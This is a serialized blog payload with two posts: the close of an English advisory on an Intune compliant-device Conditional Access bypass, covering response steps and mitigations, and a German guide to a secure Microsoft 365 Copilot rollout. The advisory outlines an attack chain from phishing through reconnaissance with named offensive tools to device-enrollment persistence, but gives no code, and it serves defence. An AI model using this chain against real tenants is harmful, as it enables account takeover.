activities?",[806,20523,816],{},[806,20525,20526],{},"Initialize your incident response process using a defined playbook which contains:",[2738,20528,20529,20549,20557,20560,20563],{},[2741,20530,20531,20532],{},"Hunting for suspicious or anomalous activity by the compromised 
user\n",[2738,20533,20534,20540,20543,20546],{},[2741,20535,20536,20537],{},"Summary of non-interactive sign-in to Resource Applications including IP addresses and UserAgents based on ",[1524,20538,20539],{},"sessionId",[2741,20541,20542],{},"Check if Microsoft Entra Audit Logs show critical operations by the user or IP addresses (e.g., added credentials to owned app registrations)",[2741,20544,20545],{},"Identify if the user has registered devices in the affected session",[2741,20547,20548],{},"Check Intune audit logs for operations by application “Company Portal” and the affected user",[2741,20550,20551,20552],{},"Hunting for related alerts by the impacted entities\n",[2738,20553,20554],{},[2741,20555,20556],{},"Look up entities in the AlertEvidence table to identify other alerts based on SessionId, IP Addresses and User",[2741,20558,20559],{},"Identify criticality of the user (by privileges) in Exposure Management",[2741,20561,20562],{},"Review of hunting results and verify if the action was legitimate as part of a device enrollment.",[2741,20564,20565],{},"Identify the initial access vector and reset the user’s credentials and, when needed, devices.",[810,20567,20569],{"id":20568},"can-we-mitigate-the-attack","Can we mitigate the attack?",[806,20571,816],{},[806,20573,20574,20575,20578],{},"Since the configured exclusion is required for Intune enrollment, ",[1736,20576,20577],{},"there is no mitigation that would not break other parts of Microsoft 365",". Access to the Azure AD Graph resource cannot be scoped or blocked directly. Any Conditional Access policy using “Block” as grant control will prevent access but might have other implications.",[806,20580,20581],{},"But for mitigation it is crucial to understand that this Conditional Access bypass is not a complete attack. 
It is a technique which, as one step, enables a range of attacks.",[806,20583,20584],{},"An attack path could be",[4351,20586,20587,20590,20593,20596],{},[2741,20588,20589],{},"Account Compromise via Phishing and AiTM",[2741,20591,20592],{},"Conditional Access Bypass",[2741,20594,20595],{},"Reconnaissance using e.g. ROADrecon, GraphRunner or AADInternals",[2741,20597,20598],{},"Lateral Movement, Privilege Escalation or Persistence through a newly registered device enrolled in Intune",[806,20600,20601],{},"Since we are not able to mitigate the Conditional Access bypass without breaking Intune enrollment, it is more than reasonable to implement mitigations at the other steps of the attack path and also implement reasonable detections.",[806,20603,20604],{},"To reduce the probability and impact we suggest increasing the strength of other controls and implementing the following soon:",[2738,20606,20607,20613,20619,20625,20631,20646,20652],{},[2741,20608,20609,20612],{},[1736,20610,20611],{},"Enforce MFA for “All Users” and “All Cloud Apps” through Conditional Access."," If you only enforce Device Compliance, Single Factor Authentication is enough with this technique.",[2741,20614,20615,20618],{},[1736,20616,20617],{},"Do not use Device Compliance OR MFA in your rulesets, always enforce both!"," Using OR would never restrict all access to compliant devices, because an access token with MFA in scope would be sufficient to access the tenant.",[2741,20620,20621,20624],{},[1736,20622,20623],{},"Restrict Security Information Registration to Compliant Devices, Phishing Resistant Authentication or TAP."," In our tests we did not manage to bypass Device Compliance for the Security Info Registration.",[2741,20626,20627,20630],{},[1736,20628,20629],{},"Require Phishing Resistant Authentication or TAP for Join or Register Devices"," Without it, it will be possible to register a device with e.g. 
AADInternals and this technique.",[2741,20632,20633,20636,20637],{},[1736,20634,20635],{},"Require MFA and “Sign-in frequency every time” for Microsoft Intune Enrollment"," This limits the timespan an attacker could use fresh credentials to enroll a new device to Intune.\n",[3587,20638,20639],{},[806,20640,20641,20642,20645],{},"🚧\n",[1736,20643,20644],{},"Caution: Sign-in frequency every time = Every five minutes","\nMicrosoft factors for five minutes of clock skew when “every time” is selected in a conditional access policy, so that users do not get prompted more often than once every five minutes.",[2741,20647,20648,20651],{},[1736,20649,20650],{},"Block personally owned devices in the Intune Enrollment restrictions."," Without these restrictions, an attacker could enroll a new device and gain additional foothold.",[2741,20653,20654,20657],{},[1736,20655,20656],{},"Set device compliance to fail when no compliance policy is assigned to a device in Intune."," By default each device is considered compliant, even if no policy is actually applied. Change this and make a device compliance policy a requirement.",[806,20659,20660,20661,2786],{},"In the long run, we would like to encourage you to invest in rollout password-less, phishing-resistant authentication like Windows Hello for Business and Passkeys (incl. Platform Credentials by using macOS Platform SSO). This will allow you to subsequently enforce phishing resistant authentication and block AiTM attacks. Instead of password allow the usage of Temporary Access Pass (TAP) for limited time and scenarios, e.g. onboarding new devices or employees. To support the usage of TAPs for various use cases we have built ",[833,20662,442],{"href":20663,"rel":20664},"https://myworkid.cloud/",[1410],[810,20666,20668],{"id":20667},"conclusion","Conclusion",[806,20670,816],{},[806,20672,20673],{},"Conditional Access as the Zero Trust engine for Entra ID is, in itself, already complicated. 
Added built-in exclusions in the backend of Entra by Microsoft make it even harder for many to understand the impact of policies and protections. Still the idea of Zero Trust and defense in depth holds up.",[806,20675,20676],{},"The device compliance policy prevents most AiTM attacks and multi-factor authentication makes it harder for any attacker to abuse leaked or otherwise compromised credentials.",[806,20678,20679],{},"All these security measures must be used together and not one instead of the other. This ensures a secure environment, even if one of the defenses is tampered with or overcome.",[806,20681,20682],{},"We strongly recommend deploying the provided detection in Microsoft Defender XDR to ensure detection of potential abuse. Make sure your SOC is prepared to investigate those incidents and provide them with the necessary playbooks.",{"title":863,"searchDepth":864,"depth":864,"links":20684},[20685,20686,20687,20690,20696,20697,20698,20699],{"id":20076,"depth":864,"text":20077},{"id":20132,"depth":864,"text":20133},{"id":20177,"depth":864,"text":20178,"children":20688},[20689],{"id":20183,"depth":1814,"text":20184},{"id":20261,"depth":864,"text":20262,"children":20691},[20692,20693,20694,20695],{"id":20267,"depth":1814,"text":20268},{"id":20297,"depth":1814,"text":20225},{"id":20330,"depth":1814,"text":20236},{"id":20338,"depth":1814,"text":20339},{"id":20352,"depth":864,"text":20353},{"id":20520,"depth":864,"text":20521},{"id":20568,"depth":864,"text":20569},{"id":20667,"depth":864,"text":20668},{"seoTitle":20701,"titleClass":873,"date":20702,"categories":20703,"blogtitlepic":20704,"socialimg":20705,"customExcerpt":20706,"keywords":20707,"contactInContent":20708,"scripts":20727},"Compliant Device Bypass in Microsoft Intune – Detection, Response & Mitigation","2025-01-14",[371],"header-company-portal-ca-bypass","/blog/heads/header-company-portal-ca-bypass.png","In this blog post, glueckkanja's MVP Fabian Bader, Chris Brumm and Thomas Naunheim gather 
details about the Compliant Device Bypass in Microsoft Intune Company Portal. After additional research, they have found an approach to detect and respond to the potential threat. You'll also find guidance on Conditional Access to reduce the attack surface and details on the blast radius.","Compliant Device Bypass, Microsoft Intune, Conditional Access, Entra ID, Intune Company Portal, device compliance, CA exclusion, TokenSmith PoC, cloud security, PowerShell PoC, Fabian Bader, Christopher Brumm, Thomas Naunheim, security threat, Black Hat Europe, Intune Enrollment, MSRC response, attack detection, threat mitigation, cloud compliance, FOCI feature",{"quote":749,"infos":20709},{"bgColor":19000,"color":884,"boxBgColor":19001,"boxColor":19002,"headline":19003,"subline":20710,"level":810,"textStyling":887,"flush":888,"person":20711,"form":20715},"Would you like to learn more about the Compliant Device Bypass and how to detect and mitigate it effectively? Our experts are ready to walk you through our findings and support you with proven strategies for enhanced security. 
We look forward to connecting with you!",{"image":19006,"cloudinary":508,"alt":19007,"name":19007,"detailsHeader":19008,"details":20712},[20713,20714],{"text":762,"href":898,"details":899,"icon":900},{"text":763,"href":902,"icon":903},{"ctaText":19013,"cta":20716,"method":870,"action":908,"fields":20717},{"skin":907},[20718,20719,20720,20721,20722,20723,20725,20726],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":19018},{"label":19020,"type":916,"id":612,"required":508,"requiredMsg":19021},{"label":19023,"type":924,"id":924,"required":508,"requiredMsg":19024},{"label":19026,"type":933,"id":934,"required":508,"requiredMsg":19027},{"type":911,"id":942,"value":20724},"Request Global Secure Access",{"type":911,"id":945,"value":946},{"type":911,"id":948},{"slick":508,"form":508},"/posts/2025-01-14-compliant-device-bypass",{"title":20070,"description":863},"posts/2025-01-14-compliant-device-bypass",[371,20732,20733,20734,432],"Entra","Conditional Access","ITDR","gqWV4sCyGgD86VtXJ87XTuZkSiHyfITlMCzYMwmcT4A",{"id":20737,"title":20738,"author":20739,"body":20740,"cta":764,"description":863,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":21231,"moment":21233,"navigation":508,"path":21267,"seo":21268,"stem":21269,"tags":21270,"webcast":749,"__hash__":21273},"content_de/posts/2025-01-09-microsoft-365-copilot.md","Microsoft 365 Copilot sicher einführen: Das müsst ihr 
wissen",[1216],{"type":803,"value":20741,"toc":21201},[20742,20746,20748,20780,20783,20785,20788,20792,20794,20797,20800,20804,20806,20809,20812,20816,20818,20821,20825,20827,20830,20833,20835,20838,20842,20844,20847,20850,20856,20859,20862,20864,20867,20873,20906,20909,20911,20914,20917,20919,20965,20968,20970,20973,20981,20984,20986,20989,20993,20995,20998,21001,21005,21007,21010,21015,21018,21021,21025,21027,21030,21033,21035,21038,21076,21079,21081,21084,21090,21093,21096,21098,21101,21109,21112,21115,21117,21120,21123,21126,21170,21173,21175,21178,21181],[810,20743,20745],{"id":20744},"übersicht","Übersicht",[806,20747,816],{},[2738,20749,20750,20756,20762,20768,20774],{},[2741,20751,20752],{},[833,20753,20755],{"href":20754},"#oversharing-kennen--kontrollieren","Oversharing kennen & kontrollieren",[2741,20757,20758],{},[833,20759,20761],{"href":20760},"#sharepoint-advanced-management","SharePoint Advanced Management",[2741,20763,20764],{},[833,20765,20767],{"href":20766},"#grundlegende-sicherheit-im-tenant-herstellen","Grundlegende Sicherheit im Tenant herstellen",[2741,20769,20770],{},[833,20771,20773],{"href":20772},"#aktualisierung-der-office-applikationen","Aktualisierung der Office-Applikationen",[2741,20775,20776],{},[833,20777,20779],{"href":20778},"#datenschutz--datensicherheit","Datenschutz & Datensicherheit",[810,20781,20755],{"id":20782},"oversharing-kennen-kontrollieren",[806,20784,816],{},[806,20786,20787],{},"Der Begriff \"Oversharing\" wird in den letzten Monaten oft verwendet, doch was bedeutet er im Zusammenhang mit der Vorbereitung auf Microsoft 365 und der Einführung von Copilot?",[1671,20789,20791],{"id":20790},"was-ist-oversharing","Was ist Oversharing?",[806,20793,1536],{},[806,20795,20796],{},"Oversharing, oder das \"Überteilen\" von Daten, bedeutet, dass Personen auf Daten zugreifen können, auf die sie eigentlich keinen Zugriff haben sollten. Dieses Problem tritt häufig aufgrund mangelnder Datenkontrolle auf. 
Ein IT-Magazin titelte im November 2024: \"Copilot lässt Mitarbeiter die E-Mails ihrer Chefs lesen\". Diese Aussage ist jedoch faktisch falsch. Derartige Vorfälle sind nicht auf Copilot zurückzuführen, sondern auf unzureichende Datenkontrollen und Oversharing.",[806,20798,20799],{},"Der Microsoft Copilot basiert auf den Daten, die dem Nutzer zur Verfügung stehen. Er erhält keine zusätzlichen Berechtigungen, sondern verwendet einen Index, der es erleichtert, auf Informationen zu stoßen oder Dinge zu finden, von denen man nicht wusste, dass man darauf Zugriff hat.",[810,20801,20803],{"id":20802},"arten-von-microsoft-teams","Arten von Microsoft Teams",[806,20805,816],{},[806,20807,20808],{},"Wir unterscheiden bei Teams zwischen privaten und öffentlichen Teams. Befinden sich sensible oder geschützte Dokumente in öffentlichen Teams, können diese von allen Mitarbeitenden im Unternehmen eingesehen und somit auch von Copilot indexiert werden.",[806,20810,20811],{},"Es spricht grundsätzlich nichts dagegen, weiterhin auch öffentliche Teams zu nutzen – sogar viele davon. Wichtig ist jedoch sicherzustellen, dass die darin geteilten Informationen und Dokumente für alle zugänglich sein dürfen.",[1671,20813,20815],{"id":20814},"empfehlung","Empfehlung",[806,20817,1536],{},[806,20819,20820],{},"Überprüft regelmäßig, welche Daten in euren Teams abgelegt sind, und räumt gegebenenfalls auf. Häufig handelt es sich um Altlasten, die beispielsweise aus der Einführungszeit von Microsoft Teams stammen und im Laufe der Zeit gewachsen sind.",[810,20822,20824],{"id":20823},"zugriff-auf-daten-in-sharepoint-online","Zugriff auf Daten in SharePoint Online",[806,20826,816],{},[806,20828,20829],{},"Die Dokumente, die in öffentlichen Teams abgelegt sind, befinden sich bekanntermaßen auch in SharePoint. Neben den Team-Sites in SharePoint gibt es jedoch auch eigenständige SharePoint-Sites und -Bibliotheken. 
Häufig haben auch hier alle oder viele Mitarbeitende Zugriff.",[1671,20831,20815],{"id":20832},"empfehlung-1",[806,20834,1536],{},[806,20836,20837],{},"Überprüft die Zugriffs- und Berechtigungseinstellungen auf den wichtigen SharePoint-Sites. Häufig verstecken sich dort beispielsweise \"Alle Benutzer\"-Objekte in den Gruppen der \"Website-Besucher\".",[810,20839,20841],{"id":20840},"dokumente-und-ordner-ab-jetzt-richtig-teilen","Dokumente und Ordner (ab jetzt) richtig teilen",[806,20843,816],{},[806,20845,20846],{},"Ein weiterer, häufiger Fehler sind die sogenannten \"Everyone Except External\"-Links, mit denen Dokumente oder Ordner geteilt werden.",[806,20848,20849],{},"Praktisch, aber gefährlich: Wählt man beim Teilen eines Dokuments den Linktyp “Personen in meiner Organisation”, erhält jede Person, die den Link verwendet, Zugriff auf die Datei – und somit auch Copilot, da dieser immer im Benutzerkontext agiert.",[806,20851,20852,20154],{},[1449,20853],{"alt":20854,"src":20855},"Freigabeeinstellungen eines Dokuments","https://res.cloudinary.com/c4a8/image/upload/blog/pics/microsoft-365-copilot-link-settings.png",[806,20857,20858],{},"Solche Links auf ganze Ordner, deren Inhalte sich über Monate oder Jahre verändern, führen häufig zu Oversharing-Vorfällen. Diese Art von Link bleibt wichtig und praktisch, sollte jedoch nicht als Standardeinstellung verwendet werden. Ein einfacher Tipp kann hier Abhilfe schaffen.",[1671,20860,20815],{"id":20861},"empfehlung-2",[806,20863,1536],{},[806,20865,20866],{},"Im SharePoint-Admincenter findet ihr unter „Richtlinien“ den Abschnitt „Datei- und Ordnerlinks“. Setzt hier die Standardeinstellung auf „Bestimmte Personen“. 
Dadurch wird die Option „Nur Personen in meiner Organisation“ erst durch bewusstes Anklicken verfügbar.",[806,20868,20869,20154],{},[1449,20870],{"alt":20871,"src":20872},"Zuordnung der Managed Services zu NIS2","https://res.cloudinary.com/c4a8/image/upload/w_940,h_200,c_lpad/blog/pics/microsooft-365-copilot-default-link-setting.png",[806,20874,20875],{},[833,20876,20879,20883],{"role":3858,"className":20877,"dataText":20878,"href":170},[3860,16252,3863],"Primary Link",[1588,20880,20882],{"className":20881},[3872],"Mehr erfahren",[1588,20884,20887],{"className":20885,"style":19157},[19154,19155,20886,3863],"icon--arrow",[19159,20888,20890],{"viewBox":20889,"width":19162,"height":19162,"padding":19163,"xmlSpace":19164,"version":19165,"xmlns":19166,"xmlns:link":19167,"style":19168},"0 0 28 17",[20891,20892,20894,20902],"g",{"transform":20893},"translate(0.75 0.75)",[19171,20895],{"d":20896,"transform":20897,"fill":20898,"fillRule":20899,"strokeWidth":20900,"strokeLineCap":20901,"strokeLineJoin":20901},"M0.5 0.5L26 0.5","translate(0 7)","none","evenodd","1.5","round",[19171,20903],{"d":20904,"transform":20905,"fill":20898,"fillRule":20899,"strokeWidth":20900,"strokeLineCap":20901,"strokeLineJoin":20901},"M0 15L7 7.5L0 0","translate(19 0)",[810,20907,20761],{"id":20908},"sharepoint-advanced-management",[806,20910,816],{},[806,20912,20913],{},"Eine neue zentrale Möglichkeit, um das volle Potenzial auszuschöpfen, ist die Nutzung der SharePoint Advanced Management-Funktionen. Diese ist seit dem 01.01.2025 in allen M365 Copilot Lizenzen inkludiert. Das bedeutet, egal ob man 1 oder 10.000 M365 Copilot Lizenzen hat, SharePoint Advanced Management ist jetzt inklusive.",[806,20915,20916],{},"SharePoint Advanced Management umfasst eine Vielzahl von Funktionen rund um die Themen Data Oversharing, Governance und Security. Bisher war dieses Add-On zusätzlich zu lizenzieren und hat deswegen kaum Beachtung gefunden. 
Die Funktionen und Möglichkeiten, die darin stecken, sind aber beachtlich und waren schon immer eine sinnvolle Ergänzung für die Administration und Vorbereitung von SharePoint Online in Bezug auf eine Einführung von künstlicher Intelligenz, wie Copilot. Microsoft beschreibt 4 Säulen, die SAM unterstützt:",[3604,20918,20192],{},[1902,20920,20921,20931],{},[1907,20922,20923],{},[1911,20924,20925,20928],{},[1915,20926,20927],{},"Thema",[1915,20929,20930],{},"Beschreibung",[1923,20932,20933,20941,20949,20957],{},[1911,20934,20935,20938],{},[1928,20936,20937],{},"Verwalten von Content-Wildwuchs",[1928,20939,20940],{},"Unterstützung der Administratoren bei der Verwaltung einer stetig wachsenden Anzahl an Dateien",[1911,20942,20943,20946],{},[1928,20944,20945],{},"Oversharing verhindern",[1928,20947,20948],{},"Erkennung und Verhinderung von Oversharing, z. B. durch defekte Berechtigungsvererbungen",[1911,20950,20951,20954],{},[1928,20952,20953],{},"Zugriff von Copilot auf Inhalte verwalten",[1928,20955,20956],{},"Tools zur Echtzeitkontrolle darüber, auf welche Dokumente Copilot zugreifen darf und auf welche nicht",[1911,20958,20959,20962],{},[1928,20960,20961],{},"Verwaltung des Dokumenten-Lifecycle",[1928,20963,20964],{},"Unterstützung bei der Überwachung und Steuerung aktiver und inaktiver SharePoint-Inhalte",[1671,20966,20815],{"id":20967},"empfehlung-3",[806,20969,1536],{},[806,20971,20972],{},"Wir empfehlen jedem, der sich aktuell mit M365 Copilot beschäftigt, diese Funktionen zu aktivieren und zu nutzen. 
Dazu gehören insbesondere die Data Access Governance, Site Lifecycle Management und Restricted Access Control Policy sowie die Funktionen, von denen einige noch in der Preview sind (Oversharing Baseline Report und Restricted Content Discoverability Policy).",[806,20974,20975,20976],{},"Mehr Details zu SharePoint Advanced Management findet ihr ",[833,20977,20980],{"href":20978,"rel":20979},"https://learn.microsoft.com/en-us/sharepoint/get-ready-copilot-sharepoint-advanced-management",[1410],"auf der offiziellen Seite von Microsoft.",[810,20982,20767],{"id":20983},"grundlegende-sicherheit-im-tenant-herstellen",[806,20985,816],{},[806,20987,20988],{},"Neben dem Zugriff auf Daten durch Copilot sollten wir sicherstellen, dass unser Tenant umfassend abgesichert ist. Der Einsatz künstlicher Intelligenz macht dies spätestens jetzt unverzichtbar. Es gibt zahlreiche Maßnahmen zur Absicherung – hier ein Überblick mit den wichtigsten Punkten.",[1671,20990,20992],{"id":20991},"umsetzung-zero-trust","Umsetzung Zero Trust",[806,20994,1536],{},[806,20996,20997],{},"Der Begriff Zero-Trust ist in aller Munde – wahrscheinlich bist du ihm auch schon begegnet. Doch was bedeutet das genau, besonders im Kontext von Copilot? Kurz gesagt: Zero-Trust bedeutet in diesem Fall, dass niemand pauschalen Zugriff auf alles erhält, sondern nur auf die Ressourcen, die aktuell benötigt werden. Dieses Prinzip, bekannt als Least Privileged Access, ist essenziell, um Daten und Systeme vor unberechtigtem Zugriff zu schützen. Es knüpft direkt an Themen wie Oversharing an, da der Fokus darauf liegt, nur die notwendigen Informationen freizugeben.",[806,20999,21000],{},"Doch Zero-Trust beschränkt sich nicht nur auf SharePoint. Es betrifft auch den Zugriff auf E-Mails in Outlook, Kundeninformationen im CRM-System und andere sensible Bereiche. Mit der zunehmenden Integration von Copilot und künstlicher Intelligenz in Microsoft 365 und darüber hinaus gewinnt dieses Konzept weiter an Bedeutung. 
Je früher du und dein Team euch damit auseinandersetzt, desto besser seid ihr für die Zukunft gerüstet.",[1671,21002,21004],{"id":21003},"zero-trust-besonders-wichtig-für-administratoren","Zero-Trust: Besonders wichtig für Administratoren",[806,21006,1536],{},[806,21008,21009],{},"Für Admins gewinnt das Thema noch mehr an Bedeutung: Mit der Einführung von Copilot in den Admincentern und dem Security-Copilot wird es unverzichtbar, administrative Zugriffe abzusichern. Tools wie Privileged Identity Management (PIM) sind hierbei entscheidend, um sicherzustellen, dass Admin-Rechte nur dann vergeben werden, wenn sie wirklich benötigt werden – und selbst dann nur zeitlich begrenzt und streng überwacht.",[806,21011,21012],{},[1736,21013,21014],{},"Mehrfaktor-Authentifizierung & Bedingter Zugriff? Ein Muss",[806,21016,21017],{},"Ein weiteres Kernelement der Sicherheit ist die Einrichtung von Multi-Faktor-Authentifizierung (MFA) und Conditional Access für alle Entra-ID-Konten in Microsoft 365. Microsoft forciert diese Einstellungen zunehmend, sodass du sicherstellen solltest, dass sämtliche Konten in deiner Organisation entsprechend abgesichert sind.",[806,21019,21020],{},"Warum ist das so wichtig? Technisch gesehen hat die Nutzung von Copilot nichts direkt mit MFA oder Conditional Access zu tun. Doch es geht darum sicherzustellen, dass die Person, die sich anmeldet, tatsächlich diejenige ist, für die sie sich ausgibt. Denn es wäre fatal, wenn ein Angreifer Zugriff auf einen leistungsstarken KI-Assistenten erhält.",[1671,21022,21024],{"id":21023},"sicherheit-ist-mehr-als-nur-grundlagen","Sicherheit ist mehr als nur Grundlagen",[806,21026,1536],{},[806,21028,21029],{},"Natürlich sind Zero-Trust, MFA und Conditional Access nur der Anfang. Ein wirklich sicherer Tenant umfasst viele weitere Aspekte. Microsoft bietet eine breite Palette an Sicherheitslösungen, darunter die Microsoft Defender-Produkte, Entra ID, Sentinel und viele mehr. 
Diese Tools helfen dir, deine Organisation noch besser zu schützen und Sicherheitslücken zu schließen.",[1671,21031,20815],{"id":21032},"empfehlung-4",[806,21034,1536],{},[806,21036,21037],{},"Wenn du Unterstützung bei der Umsetzung benötigst oder unsicher bist, wo du anfangen sollst, helfen wir dir gerne weiter. Sicherheit ist eine Reise – und wir begleiten und unterstützen dich dabei, die richtigen Schritte zu machen, um dein Unternehmen zu schützen.",[806,21039,21040,2025,21058],{},[833,21041,21043,21047],{"role":3858,"className":21042,"dataText":20878,"href":410},[3860,16252,3863],[1588,21044,21046],{"className":21045},[3872],"Mehr zu unserem Security Consulting Angebot erfahren",[1588,21048,21050],{"className":21049,"style":19157},[19154,19155,20886,3863],[19159,21051,21052],{"viewBox":20889,"width":19162,"height":19162,"padding":19163,"xmlSpace":19164,"version":19165,"xmlns":19166,"xmlns:link":19167,"style":19168},[20891,21053,21054,21056],{"transform":20893},[19171,21055],{"d":20896,"transform":20897,"fill":20898,"fillRule":20899,"strokeWidth":20900,"strokeLineCap":20901,"strokeLineJoin":20901},[19171,21057],{"d":20904,"transform":20905,"fill":20898,"fillRule":20899,"strokeWidth":20900,"strokeLineCap":20901,"strokeLineJoin":20901},[833,21059,21061,21065],{"role":3858,"className":21060,"dataText":20878,"href":423},[3860,16252,3863],[1588,21062,21064],{"className":21063},[3872],"Mehr über unser Cloud Security Operations Center 
erfahren",[1588,21066,21068],{"className":21067,"style":19157},[19154,19155,20886,3863],[19159,21069,21070],{"viewBox":20889,"width":19162,"height":19162,"padding":19163,"xmlSpace":19164,"version":19165,"xmlns":19166,"xmlns:link":19167,"style":19168},[20891,21071,21072,21074],{"transform":20893},[19171,21073],{"d":20896,"transform":20897,"fill":20898,"fillRule":20899,"strokeWidth":20900,"strokeLineCap":20901,"strokeLineJoin":20901},[19171,21075],{"d":20904,"transform":20905,"fill":20898,"fillRule":20899,"strokeWidth":20900,"strokeLineCap":20901,"strokeLineJoin":20901},[810,21077,20773],{"id":21078},"aktualisierung-der-office-applikationen",[806,21080,816],{},[806,21082,21083],{},"Der volle Mehrwert von Microsoft Copilot entfaltet sich erst durch die Integration des AI-Assistenten in den installierten Office-Applikationen (M365 Apps). Dazu gehören aktuell Word, Excel, PowerPoint, OneNote, Outlook und Teams.",[806,21085,21086,20154],{},[1449,21087],{"alt":21088,"src":21089},"Microsoft 365 Tenant","https://res.cloudinary.com/c4a8/image/upload/blog/pics/microsooft-365-copilot-tenant.png",[806,21091,21092],{},"Allerdings unterscheidet Microsoft die Verfügbarkeit und Funktionen von Copilot je nach Version der installierten Apps. Wenn bei Benutzenden beispielsweise der Semi-Annual Enterprise Channel eingerichtet ist, stehen ihnen die KI-Features von Microsoft nicht zur Verfügung.",[1671,21094,20815],{"id":21095},"empfehlung-5",[806,21097,1536],{},[806,21099,21100],{},"Stellt sicher, dass eure Office-Apps mindestens den Monthly Enterprise Channel oder idealerweise den Current Channel nutzen. Nur so gewährleistet ihr, dass Copilot und die neuesten Funktionen nahtlos verfügbar sind.",[806,21102,21103,21104,21108],{},"Doch das ist nur ein Teil des Gesamtbildes. Themen wie Application Lifecycle Management und der Einsatz moderner Software-Management-Plattformen spielen eine entscheidende Rolle, insbesondere in Verbindung mit Intune. 
Hierbei unterstützt euch unsere Lösung ",[833,21105,516],{"href":21106,"rel":21107},"https://www.realmjoin.com/",[1410],", um den Prozess effizient zu gestalten und eure Anwendungen stets auf dem neuesten Stand zu halten.",[806,21110,21111],{},"RealmJoin ist die Cloud-basierte Ergänzung zu Microsoft Intune und das fehlende Puzzlestück auf dem Weg zu einer umfassenden Client-Management-Plattform. Es erleichtert die Bereitstellung von fast 2.000 vorgefertigten Standardanwendungen für Intune in hoher Qualität – eine moderne Paketfabrik für benutzerdefinierte Anwendungen, ergänzt durch zusätzliche Funktionen wie LAPS, Remote-Support und Runbook-Automatisierung.",[810,21113,20779],{"id":21114},"datenschutz-datensicherheit",[806,21116,816],{},[806,21118,21119],{},"Gerade in europäischen Unternehmen stößt man auf Vorbehalte, wenn es um die Einführung von Microsoft Copilot geht – und das ist absolut nachvollziehbar. Neue Technologien können Unsicherheit auslösen, insbesondere wenn es um sensible Themen wie Datenschutz und Kontrolle geht.",[806,21121,21122],{},"Wenn ihr Copilot einführen möchtet, denkt daran, dass es nicht nur um die Technik geht. Setzt euch frühzeitig mit den entsprechenden Datenschutz- und Sicherheitsanforderungen auseinander. Holt dabei alle relevanten Stakeholder ins Boot – dazu gehören der interne oder externe Datenschutzbeauftragte, euer CISO, Betriebsräte, Compliance-Administratoren und andere Verantwortliche. Besprecht Vorbehalte und Fragen offen miteinander. Oft lassen sich diese Bedenken durch klare Informationen und bestehende Richtlinien ausräumen.",[806,21124,21125],{},"Microsoft bietet umfassende Dokumentationen und Erklärungen, die zeigen, wie, wann und wo Daten verarbeitet werden. Hier sind die wichtigsten Fakten:",[2738,21127,21128,21134,21140,21146,21152,21158,21164],{},[2741,21129,21130,21133],{},[1736,21131,21132],{},"Grounding der KI-Modelle:"," Die von Copilot genutzten KI-Modelle greifen nicht direkt auf eure Daten zu. 
Stattdessen erfolgt der Zugriff über den Microsoft Graph und ist strikt auf den Benutzerkontext beschränkt.",[2741,21135,21136,21139],{},[1736,21137,21138],{},"Datenschutz- und Sicherheitsstandards:"," Copilot erfüllt alle relevanten Datenschutz-, Sicherheits- und Compliance-Vorgaben, darunter die DSGVO, die EU-Datenschutzgrundverordnung sowie Standards wie ISO/IEC 27018 und den EU AI-Act.",[2741,21141,21142,21145],{},[1736,21143,21144],{},"EU-Data Boundary:"," Alle Daten werden so nah wie möglich am Benutzer verarbeitet, jedoch immer innerhalb der EU. Die sogenannte EU-Data Boundary wird strikt eingehalten.",[2741,21147,21148,21151],{},[1736,21149,21150],{},"Verschlüsselung:"," Eingaben (Prompts) und Ergebnisse werden verschlüsselt und niemals zur Weiterentwicklung von KI-Modellen (LLMs) genutzt.",[2741,21153,21154,21157],{},[1736,21155,21156],{},"Compliance und Nachvollziehbarkeit:"," Prompts und Ergebnisse werden verschlüsselt im Tenant gespeichert. Sie können im Rahmen gesetzlicher Anforderungen analysiert werden, beispielsweise für Prüfungen oder bei richterlichen Anordnungen. Der Zugriff darauf ist nur mit speziellen Berechtigungen, etwa über Content Search oder eDiscovery, möglich.",[2741,21159,21160,21163],{},[1736,21161,21162],{},"Sicherheitsmaßnahmen:"," Microsoft schützt seine Dienste, einschließlich Copilot, durch logische Isolierung, physische Sicherheitsmaßnahmen und Verschlüsselungstechnologien. Plug-Ins haben nur eingeschränkten Zugriff auf verschlüsselte Inhalte.",[2741,21165,21166,21169],{},[4655,21167,21168],{},"Responsible AI:"," Microsoft legt großen Wert auf die verantwortungsvolle Nutzung von KI. 
Der Fokus liegt darauf, KI-Services positiv und ethisch einzusetzen und ihren Missbrauch für illegale oder fragwürdige Zwecke zu verhindern.",[1671,21171,20815],{"id":21172},"empfehlung-6",[806,21174,1536],{},[806,21176,21177],{},"Indem ihr euch frühzeitig mit diesen Themen beschäftigt und die relevanten Personen einbindet, schafft ihr Vertrauen und legt den Grundstein für eine erfolgreiche Einführung. Viele Bedenken lassen sich bereits durch die bestehenden Sicherheitsmaßnahmen und Richtlinien von Microsoft entkräften. Wenn ihr Unterstützung benötigt, stehen wir euch gerne zur Seite. Datenschutz und Sicherheit sind entscheidend – und wir helfen euch, diese Anforderungen optimal umzusetzen.",[806,21179,21180],{},"Mehr Informationen und Hintergrundwissen gibt es direkt bei Microsoft an verschiedenen Stellen wie:",[2738,21182,21183,21189,21195],{},[2741,21184,21185],{},[833,21186,21187],{"href":21187,"rel":21188},"https://learn.microsoft.com/de-de/copilot/microsoft-365/microsoft-365-copilot-privacy",[1410],[2741,21190,21191],{},[833,21192,21193],{"href":21193,"rel":21194},"https://support.microsoft.com/de-de/topic/was-ist-verantwortungsvolle-ki-33fc14be-15ea-4c2c-903b-aa493f5b8d92",[1410],[2741,21196,21197],{},[833,21198,21199],{"href":21199,"rel":21200},"https://learn.microsoft.com/de-de/copilot/microsoft-365/microsoft-365-copilot-architecture-data-protection-auditing",[1410],{"title":863,"searchDepth":864,"depth":864,"links":21202},[21203,21204,21207,21210,21213,21216,21219,21225,21228],{"id":20744,"depth":864,"text":20745},{"id":20782,"depth":864,"text":20755,"children":21205},[21206],{"id":20790,"depth":1814,"text":20791},{"id":20802,"depth":864,"text":20803,"children":21208},[21209],{"id":20814,"depth":1814,"text":20815},{"id":20823,"depth":864,"text":20824,"children":21211},[21212],{"id":20832,"depth":1814,"text":20815},{"id":20840,"depth":864,"text":20841,"children":21214},[21215],{"id":20861,"depth":1814,"text":20815},{"id":20908,"depth":864,"text":20761,"chil
